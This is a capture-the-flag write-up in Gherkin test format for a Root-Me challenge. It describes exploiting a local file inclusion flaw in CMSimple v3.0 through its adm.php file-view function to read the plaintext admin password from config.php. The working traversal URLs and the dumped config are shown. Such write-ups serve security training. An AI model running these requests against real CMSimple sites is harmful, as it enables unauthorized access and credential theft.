## Version 2.0
## language: en

Feature: rootme-realist-p0wn3d
  Site:
    root-me.org
  User:
    ununicornio
  Goal:
    Get the CMSimple admin password

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | 2017.3    |
    | Firefox Quantum       | 64.0b14   |

  Scenario: Success:LFI
    Given I go to the challenge, and get prompted
    """
    A small association that wants to create an internet site did even not have
    the time to install "cmsimple" CMS before being hacked. You must do
    something ! Get the password needed to manage portal’s content.
    """
    And get a link to the CMSimple site
    Given the site is using CMSimple v3.0
    And that version has a known LFI vulnerability
    And it stores the admin password in plaintext in "config.php"
    Then I try loading "config.php" through direct LFI
    """
    http://challenge01.root-me.org/realiste/ch6/index.php?sl=../config
    """
    But just get the normal index
    Then I look for the CMSimple v3 source code
    Then I notice in "adm.php" there's a function to view files
    Then I use LFI to load "config.php" through that function
    """
    http://challenge01.root-me.org/realiste/ch6/index.php?sl=../adm&file=config
    &action=view&adm=1
    """
    Then I can view the file and get the password
    """
    <?php
    $cf['security']['password']="flag";
    $cf['security']['type']="page";
    $cf['site']['title']="So easy to p0wn !";
    $cf['site']['template']="default";
    $cf['language']['default']="en";
    $cf['meta']['keywords']="mpffff, so weak";
    $cf['meta']['description']="CMSimple is a simple content management
    system for idiot maintainance of small commercial or private sites.
    It is simple - small - idiot !";
    ...
    """
    Then I submit the password and pass the challenge
